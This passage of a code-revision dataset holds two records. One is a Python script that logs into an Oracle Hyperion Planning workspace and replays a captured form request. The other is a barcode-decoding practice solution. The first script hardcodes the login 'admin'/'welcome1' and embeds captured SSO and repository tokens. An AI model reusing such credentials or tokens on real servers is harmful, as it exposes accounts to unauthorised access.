'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\nif __name__ == '__main__':\n workspaceLogon('admin', 'welcome1')\n request_dyn()\n request_planning_session('JSTI')\n request_planning_table()\n",
"step-4": "import requests\nfrom urllib.parse import quote\nimport logging\nfrom urllib.parse import urlparse\nlogger = logging.getLogger(__name__)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter(fmt=\n '%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nconsole.setFormatter(formatter)\nlogger.addHandler(console)\nuserAgent = (\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n )\nserverUrl = 'http://epm.huaxinglu72hao.com/'\nhost = 'epm.huaxinglu72hao.com'\ns = requests.Session()\ns.headers.update({'User-Agent': userAgent})\ns.headers.update({'Referer': serverUrl})\ns.headers.update({'Host': host})\n\n\ndef workspaceLogon(account, password):\n logger.info('logon: 开始模拟登录workspace')\n postUrl = '%sworkspace/logon' % serverUrl\n postData = {'sso_username': account, 'sso_password': password}\n try:\n responseRes = s.post(postUrl, data=postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError('登录失败: 网络异常, 请检查服务器地址配置')\n logger.info('登录返回: ' + responseRes.text)\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n assertertoken_ = {'ora_epm_ctg': assertertoken}\n updateHeaders(assertertoken_)\n token = {'_sso_token': sso_token}\n updateHeaders(token)\n CSRF = responseRes.headers.get('X-ORACLE-BPMUI-CSRF')\n csrf_ = {'X-ORACLE-BPMUI-CSRF': CSRF}\n updateHeaders(csrf_)\n ECID = responseRes.headers.get('X-ORACLE-DMS-ECID')\n h = {'X-ORACLE-DMS-ECID': ECID}\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f'更新请求头: {h}')\n s.headers.update(h)\n\n\ndef request_dyn():\n logger.info('dyn: 开始测试请求')\n postUrl = '%s/raframework/browse/dyn' % serverUrl\n postData = {'page': '/conf/CDSConfig.jsp', 'amp': '', 'action':\n 'returnXML', 'LOCALE_LANGUAGE': 'en_US', 
'rightToLeft': 'false',\n 'accessibilityMode': 'false', 'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 
'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\nimport re\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 
'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\nif __name__ == '__main__':\n workspaceLogon('admin', 'welcome1')\n request_dyn()\n request_planning_session('JSTI')\n request_planning_table()\n",
"step-5": "#! py -3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom urllib.parse import quote\nimport logging\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger(__name__)\n\nlogger = logging.getLogger()\n# 配置日志级别,如果不显示配置,默认为Warning,表示所有warning级别已下的其他level直接被省略,\n# 内部绑定的handler对象也只能接收到warning级别以上的level,你可以理解为总开关\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter(fmt=\"%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S %p\") # 创建一个格式化对象\n\nconsole = logging.StreamHandler() # 配置日志输出到控制台\nconsole.setLevel(logging.INFO) # 设置输出到控制台的最低日志级别\nconsole.setFormatter(formatter) # 设置格式\nlogger.addHandler(console)\n\n\n# 后续这些配置项都会移动到一个单独的配置文件\nuserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"\n# serverUrl = \"http://192.168.60.125:19000/\"\nserverUrl = \"http://epm.huaxinglu72hao.com/\"\nhost = \"epm.huaxinglu72hao.com\"\n# 定义当前会话\n# 会话使用统一的header 和 cookie\n# 下面代码更新header 和 cookie 的使用后续的所有请求都会使用更新后的header 和 cookie\n# 所以下面的函数没有返回值\ns = requests.Session()\ns.headers.update({\"User-Agent\": userAgent})\ns.headers.update({\"Referer\": serverUrl})\ns.headers.update({\"Host\": host})\n\n\n\n\n\n\ndef workspaceLogon(account, password):\n # 登录\n logger.info(\"logon: 开始模拟登录workspace\")\n\n postUrl = \"%sworkspace/logon\" % serverUrl\n postData = {\n \"sso_username\": account,\n \"sso_password\": password,\n }\n try:\n responseRes = s.post(postUrl, data = postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError(\"登录失败: 网络异常, 请检查服务器地址配置\")\n\n\n\n logger.info(\"登录返回: \" + responseRes.text)\n\n # 无论是否登录成功,状态码一般都是 statusCode = 200\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n\n assertertoken_ = {\"ora_epm_ctg\": assertertoken}\n\n updateHeaders(assertertoken_)\n\n token = {\"_sso_token\": sso_token}\n updateHeaders(token)\n\n\n CSRF = 
responseRes.headers.get(\"X-ORACLE-BPMUI-CSRF\")\n csrf_ = {\"X-ORACLE-BPMUI-CSRF\": CSRF}\n updateHeaders(csrf_)\n\n ECID = responseRes.headers.get(\"X-ORACLE-DMS-ECID\")\n h = {\"X-ORACLE-DMS-ECID\": ECID}\n\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f\"更新请求头: {h}\")\n s.headers.update(h)\n\n\ndef request_dyn():\n\n logger.info (\"dyn: 开始测试请求\")\n postUrl = \"%s/raframework/browse/dyn\" % serverUrl\n postData={\n \"page\": \"/conf/CDSConfig.jsp\",\n \"amp\":\"\",\n \"action\": \"returnXML\",\n \"LOCALE_LANGUAGE\": \"en_US\",\n \"rightToLeft\": \"false\",\n \"accessibilityMode\": \"false\",\n \"themeSelection\": \"Skyros\",\n \"sso_token\": s.headers.get(\"_sso_token\")\n }\n responseRes = s.post(postUrl, data=postData)\n # logger.info(f\"dyn: 响应text:{responseRes.text}\")\n logger.info(f\"dyn: 响应header:{responseRes.headers}\")\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n 
\"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n\n\n\n\n logger.info (\"planning_session: 开始测试请求\")\n postUrl = \"%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp\" % serverUrl\n postData={\n \"accessibilityMode\": \"false\",\n \"bpm.contentheight\": \"621\",\n \"bpm.contentwidth\": \"1314\",\n \"bpm.objectpaletteheight\": \"648\",\n \"bpm.objectpalettewidth\": \"207\",\n \"cluster\": \"PLANNING_LWA\",\n \"instance\": \"7\",\n \"LOCALE_LANGUAGE\": \"zh_CN\",\n \"mru_id\": f\"PLANNING_LWA_{plan_name}:application\",\n \"repository_token\": s.cookies.get(\"ORA_EPMWS_session\"),\n \"rightToLeft\": \"false\",\n \"sourceApp\": plan_name,\n \"sso_token\": s.headers.get(\"_sso_token\"),\n \"themeSelection\": \"Skyros\",\n }\n responseRes = s.post(postUrl, data=postData)\n # logger.info(f\"dyn: 响应text:{responseRes.text}\")\n logger.info(f\"planning_session: 响应cookie:{responseRes.cookies}\")\n\n # 手动添加两个cookie\n s.cookies.set(\"ORA_HP_MRUApplication\", plan_name, path=\"/HyperionPlanning/\", domain=host)\n s.cookies.set(\"ORA_HP_MRUUsername\", s.cookies.get(\"ORA_EPMWS_User\"), path=\"/HyperionPlanning/\", domain=host)\n\n logger.info(\"当前的header为: \" + str(s.headers))\n logger.info(\"当前的cookie为: \" + str(s.cookies))\n # logger.info(f\"planning_session: 响应:{responseRes.text}\")\n\n# 访问一个具体的表单\nimport re\ndef request_planning_table():\n # 下面的数据都是写死的, 只适用于JSTI->A0000主要指标表\n s.headers[\"Adf-Ads-Page-Id\"] = \"2\"\n s.headers[\"Adf-Rich-Message\"] = \"true\"\n url = serverUrl + 
\"/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state=\"\n response = s.post(url + \"14hssan6gi_4\",\n data=\"p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn\")\n\n\n # 从输出的结果看被重定向了\n logger.info(response.content)\n\n # m = re.search(r\"_adf\\.ctrl-state=.+?&\", response.text)\n # current = m.group(0).split(\"=\")[1].replace(\"&\", \"\")\n #\n # response = s.post(url + current,\n # 
data=\"p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn\")\n #\n # logger.info(response.content)\nif __name__ == \"__main__\":\n # 从返回结果来看,有登录成功\n workspaceLogon(\"admin\", \"welcome1\")\n request_dyn()\n request_planning_session(\"JSTI\")\n request_planning_table()\n # logger.info(\"sso_token = %s\" % sso_token)\n # logger.info(\"sso_token = %s\" % sso_token)\n # logger.info(\"assertertoken = %s\" % assertertoken)\n # request_dyn(sso_token,assertertoken)\n # requestHSS(\"tYy6FOvH4ZhJR1CUTy83Q9ZJxiNnYbnAt8fjWcMBII4rEmQlYjth+/M4MLIXVuXp7Hi3xQS4+QRySoxvNuFibcGbxbIYRVLFVKogwyhtIAcvtIXMvfhxd8svcLZgIXyTklurCsTarP9KtRgc26B3XRWlDG/QAzVLWyGH26ROffQpUj+bW6yRrj7A0udq1PbqGFXjDZ9iNW0ALbg0Z5NC7g3pBgjtetBohXRmpV32DCw4tI1Y7j7tLnHtSFk/NtdNri5AAFCTqTPd6HYdBzbCDqfP7ZEdfeXJFsfatRE5Pcgqm36hV1U7HeDENhTvNBtZiiQ9OfMdopyHQQvPnBQsyfKzSKTq1O5bSHH9HzQfCJdvq/nkSbalctY2SxIb0vtefJ9fUZ2y4bMAm/g95EZLiKZ5aouVrzOKjt8sl1zVctk+Ivg141wUPqtTULOYdBoi\")\n\n\n",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.stdin = open('sample_input_17.txt', 'r')
T = int(input())
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
import sys
sys.stdin = open('sample_input_17.txt', 'r')
T = int(input())
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
import sys
sys.stdin = open("sample_input_17.txt","r")
T = int(input())
def code(N): # 암호코드가 있는 열의 위치를 찾음
code = []
for i in range(N-4):
for j in range(49,53):
if S[i][j] == "1" :
code = S[i]
return code
def code_s(code): # 암호코드의 행 위치를 찾아 슬라이싱
for x in range(M-1,0,-1):
if code[x] == "1" :
return code[x-55:x+1]
def code_c(code_s) : # 암호코드를 7개의 숫자로 슬라이싱하여 해독 정보와 비교
lists = []
for n in range(8):
for m in range(10):
if code_s[n*7:(n+1)*7] == numbers[m] :
lists.append(m)
return lists # 해독 코드
for tc in range(T):
N,M = map(int,input().split())
S = [input() for _ in range(N)]
numbers = ["0001101","0011001","0010011","0111101","0100011",
"0110001","0101111","0111011","0110111","0001011"]
print(f"#{tc+1}",end=" ")
if not (sum(code_c(code_s(code(N)))[0:7:2])*3+sum(code_c(code_s(code(N)))[1:8:2]))%10 : # 해독코드 10배수인지 확인
print(sum(code_c(code_s(code(N))))) # 10배수면 암호코드의 1을 모두 더함
else : # 아니라면 0
print(0)
|
flexible
|
{
"blob_id": "b739c1de6c008158ee3806bed9fa2865eb484b4f",
"index": 5596,
"step-1": "<mask token>\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
"step-3": "<mask token>\nsys.stdin = open('sample_input_17.txt', 'r')\nT = int(input())\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
"step-4": "import sys\nsys.stdin = open('sample_input_17.txt', 'r')\nT = int(input())\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
